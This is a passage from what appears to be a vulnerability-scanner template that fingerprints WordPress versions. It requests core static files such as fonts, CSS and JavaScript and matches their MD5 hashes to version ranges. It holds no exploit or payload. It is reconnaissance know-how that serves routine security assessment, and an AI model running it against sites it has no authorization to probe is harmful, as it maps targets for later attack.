md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/certificates/ca-bundle.crt" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"dd1c7bdebdfc411eb8a336e3d758692c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c3d19568d619663bd612ca5129c26c55\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"aab39209c0b97f2736d2270762c3624b\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"b6ea3b5f9b5cc919157579ecdefd7901\" == md5(body))" - - type: dsl - name: 3.9 - 4.3.25 - dsl: - - "(\"978976c7bbfab9219a6f0a8a66a4da6f\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"34120794e34a546b6de505bc6a89bcc2\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"d147a698ed8a7435c9e9b247947dff40\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8bf79be04d97a454855bd1874202faf1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/_mixins.scss" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"1f5a52b31cf5aba613aa845f2db7ac9f\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"45226dc97aee32844ae5b2c7953c50f8\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"53e25fcbec91e57c9127342e6f2736ee\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"4b98278e5b5d5d8a5e3dbe6d246086ee\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0c671ea644e705d3ec65d2586dd48dfb\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"18d869c6a21b54fdf1038dadc8b62810\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"954efa737206be92e93d6b37e5b196c5\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"723a63056857f5f5f511f42f35782362\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5860c2c0a06f69f860481178fe83ba43\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/fonts/dashicons.ttf" - matchers: - - type: dsl - name: 4.5 - 5.1.8 - dsl: - - "(\"8fea1fce46bafe469ba2f101fdc583e2\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"4e1e8fbebedb4172f1635a4cf29624e8\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"8a457a7b9d43377c070b0fe91732ed95\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"0405baf6fced62a8bc43c1c850a71228\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"b2888b3f2157dade22fa872b83d5f7d0\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"d95c104c80bd6a47f25bc9c59b06a8ac\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"ece97919ac9f753c2ed3578d70c6e64c\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"f51888c22cfeae654d923aa37753f28e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"1e37a8a1c2f7de7cb1afd8fba108875a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/fonts/dashicons.eot" - matchers: - - type: dsl - name: 4.5 - 5.1.8 - dsl: - - "(\"30e410c715c6215fa7faa1c979b6480c\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"f379d2e99493ad79891d8300bf7a4a31\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"cea23664cbf4f6c9484411cbc651d983\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"51d3581d8ce7768f8dac4864012a5810\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f2821f84ced7b3da403692069e60a5ca\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"8c4f9123fff2c332e0cbb4ca4b9d9c15\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"2702a00aa0b250258802454163f55d22\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"e0eef7c2c85fd5996597c086a87c0ece\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d34e1a3e778ff0cb40e991522d2f59f6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/fonts/dashicons.svg" - matchers: - - type: dsl - name: 4.5 - 5.1.8 - dsl: - - "(\"780e6968cd0e378b1f7723d89fa59ab5\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"21e6b28a2d95d779f553565c7831c97d\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"0b7e1f9b2978e48c89f99c5befaf77f8\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"f9927f4ee56c9da2582fc659ea081c45\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"299c19436c4fd8efbfae957faf3a5865\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"ac42d06eda2d36f30d635619065ce9cd\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"1c7e93cbb4adc19d2d93774853614642\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"90b2bb03672d9f516946d43fd968d320\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"b4e45f9133245fc26e06a0f7358ed758\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"abc638f8cc1a449589f918924b890a3f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"94fc4b1b3b506fae95e65c01ec8060ad\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"435422a1529aa1a64a7e832de8c7201d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"cf88e57d3607009d841323d6e9d63f5c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3bdff653d5bdbc0a4446629efdf092a6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"2ddb9c1a0460fb2bd1684880ec5e4b7f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"35f23fc2280b36e67ad2afb8c6737a03\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e71c620fc51e33ea2520d4fc4c4e6a1d\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"14c9bc1def45cfccbb2f373ce18eab15\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d76196885628d30f368438b677af21c9\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"b7af24abaa51453f7aef518ff4cf5be4\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"d356512a353a71d70dbeddc53fdf93ce\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"fbd7d52b70da05ac5766d38def80640e\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"af2c241362bc2db6bf4a1ef85b8c1900\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"6b88a75b7cca4c87d4b0e0f76b80613f\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"70286b97d5864bfc0872ee0aba7592ec\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"6892675f6dabe164a066d42040451ffd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4a03b95e0743063cbeccc8e5e88b12db\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"755f417e35f6e509919b4ed9779ef194\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"630fe75a208e73076c51908d642ed8b1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ec4fea38c27fedb1f549773ee967311f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c0b614a2810b91a5242adb6cb38d3420\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"46120afa9c33ecf316c421b3a73878d6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"2b6f0cc54e381fd52f3a3726e09c1d07\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d3ac6be23d260f9cd35bedfe4d578536\" == md5(body))" - - type: dsl - name: 4.1 - 4.4.24 - dsl: - - "(\"659d8f1d3bfd32cf405f6591d0521e7c\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"a5aa5e94961a7956616cb53188a39d7e\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"9f525a1f1daa87dfbc70e3799598177b\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a9c4b3dcac8cb4cd962ee0e16cdf5f8c\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"839d6017ae96d4f4bfd3a8a88b5bd131\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"789f878bf9f2bbefcbbf4809400fb4c9\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"723a6f72315da6e688f995bd48d4af5e\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"02dcb077436fc774c545183ee6758e46\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6ee451c64cfaeb2ac6a52570859b7d7f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"211e6c30ed511e57b88efe2a2b97c5fd\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"640c78f58918e7b49621cf4cf9cc6752\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mce-view.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"a02d8e96c2f2ca0fc149b7c4c1385c9c\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"3171547f82442fc2d55817bfa741315a\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"121281e52f8f9965f747ca5e8ab92abe\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.5 - dsl: - - "(\"e79d4033829ddc9cb1d968100df9b094\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"134875901c4aeec9dd4d791828e635a1\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"6be4f47b111998d7c3f88336950240fd\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"b3cb42fc1d614d798625962d17e8f2ac\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.9 - dsl: - - "(\"985f1702972d4eef6b3665a0cee35c5b\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.5.23 - dsl: - - "(\"9c171534b6904b542a02ba6e85646da7\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.11 - dsl: - - "(\"5d93951714ec40da1cd2defc66fb4ce0\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"3993177e8de05866db54370ef2cc1a16\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.15 - dsl: - - "(\"d5bad7fcb5c9c00f9fcb77bbfbf4646a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"20d3f2cf57d63060adbe47ccaae6919f\" == md5(body))" - - type: dsl - name: 4.2.16 - 4.2.29 - dsl: - - "(\"8621171808a24ad81795d1804c1bc43c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.18 - dsl: - - "(\"09186e22f2a86dbde1dec5de41d00321\" == md5(body))" - - type: dsl - name: 4.1.19 - 4.1.32 - dsl: - - "(\"099b86bb322333cbe7687cf8f8fe4a09\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.18 - dsl: - - "(\"60702513880e16adb71448cf115a9f6d\" == md5(body))" - - type: dsl - name: 4.0.19 - 4.0.32 - dsl: - - "(\"95b8b4588c3cfe067139835d87ff7c0d\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"060bb01b7454220cd57ded1ade4ae3aa\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"3ab7c5e518658b152c35ee8ff512fdc4\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"09f646383af1481207855a1eaf2d8f16\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"1163b4783b075a846141a411ea2d5209\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"f2e51a6cc3a8ea3f6d149602645bcb91\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"946c78e0f2ae661b7ca6acb3a80987c0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"41e4a587bb092d37b80b8f197f6842c1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"040bc7424efb883e7226c1d9449fe71e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3273b048aba1d9913b5bbfa918960973\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets-rtl.min.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"5133e5b6aa9c65dc7a385dfe2e395607\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"28048bd84191c288acbb362dea9da056\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"56dcc8388a67eea5a342dc00491867e4\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2376bf23907c57f6e89dd987b5ed3fb7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"c44000ca530596769874bb8e725adba6\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.16 - dsl: - - "(\"9c02078d0cb2936ed51d3590fbc5d4df\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"588617d976f0fb7e8d6377001ceda9b3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8f3b1166439554f8821758ce3f53a45f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b08752318b9c677797dd97e3035730a7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d13a6498560ed8a0e7e637376fdb38d8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"aa169601709ec48a851e50bf7b4df792\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"1de46221189dbf7578b5cfa92e722cc1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets.min.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"54e466ebec259ef39e66374768426fb8\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"c2c8b0acd264abd814f40dab2563f3cf\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"feeb10baeb29b091f5d9cd6beccc0c16\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"054a9a4f057e1057120fa094954e85e7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"d26e12df2dd2acb67f3e768e01f5b5d8\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.16 - dsl: - - "(\"19c552633033aa4eab0627ace254e478\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"35ac681c6587823563f4ecee720be77e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0c32ce84717519f1ab8d89ef8cc1c6aa\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"5092d40859d943f65627049abf981d69\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"cb7baee9f7277ad7a550f10e038c4d35\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8f8ed98776719f11c67006155b77a503\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"96f7b64b0a293ac2e43d228f140f4568\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/color-picker-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"12a802c8cbfa88cc665b0994bc8078be\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"6996ba94f4b34f766673ae879e4a42d5\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"e6e925fb28b187d58f2a354f12bdb56f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3c83b20f43ff0c65312d1f9fa2d09dbb\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"3646498d3f7a1ef1d030eedfef4d8b7f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b95a1b3477b0c06cfa7f65a11d24bbe8\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"0d4f8264edecbb041953ef3c360724a8\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5f12fd52fc0a85758a30b0eebd0ddc70\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"cc1d21402180701c47c1455bc5847fdb\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"35a559a8d3f4dddca3af16ae66c3cf9a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"ed1555ab1980b0a7980504a6acfa5f54\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"cccc0c8b5781a897c2797f83384ee717\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"92976428bea2c2f91fe83b05ca5ea792\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"5eae583d4410229d647883abefc5b1b0\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"0d106d6a3700a6bb7483879d5b8dfd9f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"3a59db8bd48105485439d60f7ac0724f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"efbb612a09e588d6e30d9059a37edf41\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e984b359754d68064546821a1dfa1c61\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/color-picker.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"2538bba34977629156eb95be7d22407f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"9c7f4adc0cd1fe1a15e89ff4082f4b7c\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"d156a5d5a2d81aa45d55b389236e8ce1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"9318703417f33d95bd763eedd948458c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"872f4d623649b2d92097ec890c34d3bf\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b4bbb3b27d8fa55598129646b3bf278f\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"c381190bf97c9f1ee41c777e93b12351\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c976ab722a8e8698ca56a38df290504b\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"37cbd34c7179a2f7445918849718d8fb\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"9d746a565ddc0e7ad9f9521644289b90\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"3b55aee012fbb85df3b3fd5d0f85a60c\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"97228f8038ad04b998ee386178c9172e\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"267633fa6a190b5fa93afcc31f25adac\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"0afe195a271ca7a4bf8f08000bf943a2\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"fd3b392c0f810400081121da5a126dd0\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"facd6968ed068cdedb3116f4a2622a93\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"23092c4dff038dd3816799c6316d122d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"192fcdf5a7dae10e778909851e32daa2\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"b06dabae90e1bbb1c1c936b8c6660bf9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/color-picker-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"ee85b5250e7815439f67eca0ceb59036\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"f875ffad5553d662beea97e63ec24bbf\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"3ca392110eade74ac3d8c28e70482844\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2edae70311d6de48156afa8ca917f432\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"f9e65b1bb803a9710e3447d689c1d361\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"ffd34afb44098936fc2be7362680e0cc\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"7d5a0ea95d3801084e0b9aedfb6a8c10\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"2ea14e975c4bc7d5e1c28b575b1cb940\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"96caf0347b9d3d8caf8fe65fff4d7ca2\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"de3577867deb3d96f8a587a17b59af5f\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8c4e9e4548bc64ed268f8f439d7c7c15\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0ff078a3f7baf8d8769056da9d716780\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"5ff8af8e60911aaf02b87090d443807f\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"907dd7dd486d3e6bb25b36d3b8e911d9\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f18bd5023076c4185b77065ee7f93ade\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"fb72212cb33ced43457ffc0e6b715ac8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5f27b2435a5ebbaa64894de16d3a01a3\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"834b5f756a3a6d4a7b53d9e9b8eb8252\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/color-picker.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"491203d53f7340386ac8c4cd77037620\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"12b60d94f9826d402e66c2e9194aa80b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"397074641a606a0a2d568df73d020562\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"aff61e2d6b0c8508660bf5e84c8658e3\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"2d0d4dc75f8710681395c1b31c6c662f\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"b51e0884a4d3518fa2eed8a2e6248078\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a524dc26a603495c337003e58b22ed32\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"bb259343e9e768b09cfb600230ef29c1\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"b90e7baca3cbec8c1d5a11da060bcdfd\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"22295bf92914ef4879b36a640326ad19\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"aa73ab1f23b74890805f2331ca695045\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e62ecc1c0e687cffa3c68ce2a0ec06dc\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"67f85a94b1d72de7e104c58ee9bc450a\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"33c7b9426ba9f1a6a4376b3ca1f46427\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"4d52e18de0b095dddb25fa4b62917529\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"0e1541a8fb8c53e12386575a492301da\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0027d5e4a0fe6b521a07f94adea4d373\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3be49c25423a3be9d7d5367c0182a5b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"e5e40f16166f580e6c8289a7e219e1f4\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"58dbb81230e96444f2de93603322dbac\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"509037f00aa46fcdb410056240b0769c\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.3.6 - dsl: - - "(\"0c079b9a73b9cfc434e2188b5b9a2ce8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b96ede4ca000191624f6b1abbc8a2d02\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"54667710ec100561789a6303887e681e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.js" - matchers: - - type: dsl - name: 4.7.1 - 4.8.15 - dsl: - - "(\"207399a4074c9ef066c5834c07e43f08\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"191408780b5578f0b022dece40792719\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"224df0174bc39fd8f3f1ce3bc0b428f8\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"272fac6db6ba470a966e5e363fff1335\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"a475fa643ad31db4aaa72d48169ee109\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"bfdaaed26c7669aba522ef65bdcdd778\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1bd63167853ac0f0233ef6ac84cd8e66\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"1b5b4e6d2012ac6cf156d2aa3384a68e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-models.js" - matchers: - - type: dsl - name: 4.3 - 4.8.15 - dsl: - - "(\"3a799b747d1cc99f440ec4630a32e040\" == md5(body))" - - type: dsl - name: 3.9.1 - 4.2.29 - dsl: - - "(\"d420d2bafa7a4370a74f45ad61d956ec\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"edb4c59aa080eeaa22439faba31f8558\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"28a921114915381d0837f90180e29f9c\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"edc8e3858fdd8365e03b244c9d368f37\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - 